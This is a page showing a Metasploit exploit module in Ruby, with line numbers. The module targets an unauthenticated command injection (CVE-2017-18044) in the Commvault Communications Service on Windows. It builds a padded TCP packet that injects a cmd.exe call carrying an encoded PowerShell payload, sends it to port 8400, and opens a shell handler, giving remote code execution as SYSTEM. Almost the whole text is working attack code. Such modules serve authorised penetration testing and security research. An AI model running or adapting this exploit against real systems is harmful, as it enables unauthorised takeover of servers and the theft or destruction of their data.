Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/commvault_cmd_exec.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8
  include Msf::Exploit::Remote::Tcp

9
  include Msf::Exploit::Powershell

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Commvault Communications Service (cvd) Command Injection',

16
        'Description' => %q{

17
          This module exploits a command injection vulnerability

18
          discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5

19
          and v10). The vulnerability exists in the cvd.exe service and allows an

20
          attacker to execute arbitrary commands in the context of the service. By

21
          default, the Commvault Communications service installs and runs as SYSTEM in

22
          Windows and does not require authentication. This vulnerability was discovered

23
          in the Windows version. The Linux version wasn't tested.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author

28
        ],

29
        'References' => [

30
          ['CVE', '2017-18044'],

31
          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']

32
        ],

33
        'Platform' => 'win',

34
        'Targets' => [

35
          [

36
            'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',

37
            {

38
              'Arch' => [ARCH_X64, ARCH_X86]

39
            }

40
          ],

41
        ],

42
        'Privileged' => true,

43
        'DefaultTarget' => 0,

44
        'DisclosureDate' => '2017-12-12',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options([Opt::RPORT(8400)])

54
  end

55


56
  def exploit

57
    buf = build_exploit

58
    print_status("Connecting to Commvault Communications Service.")

59
    connect

60
    print_status("Executing payload")

61
    # Send the payload

62
    sock.put(buf)

63
    # Handle the shell

64
    handler

65
    disconnect

66
  end

67


68
  def build_exploit

69
    # Get encoded powershell of payload

70
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')

71
    # Remove additional cmd.exe call

72
    psh = "powershell"

73
    idx = command.index(psh)

74
    command = command[(idx)..-1]

75


76
    # Build packet

77
    cmd_path = 'C:\Windows\System32\cmd.exe'

78
    msg_type = 9

79
    zero = 0

80
    payload = ""

81
    payload += make_nops(8)

82
    payload += [msg_type].pack('I>')

83
    payload += make_nops(328)

84
    payload += cmd_path

85
    payload += ";"

86
    payload += ' /c "'

87
    payload += command

88
    payload += '" && echo '

89
    payload += "\x00"

90
    payload += [zero].pack('I>')

91


92
    # Add length header and payload

93
    ret_data = [payload.length].pack('I>')

94
    ret_data += payload

95


96
    ret_data

97
  end

98
end

99


100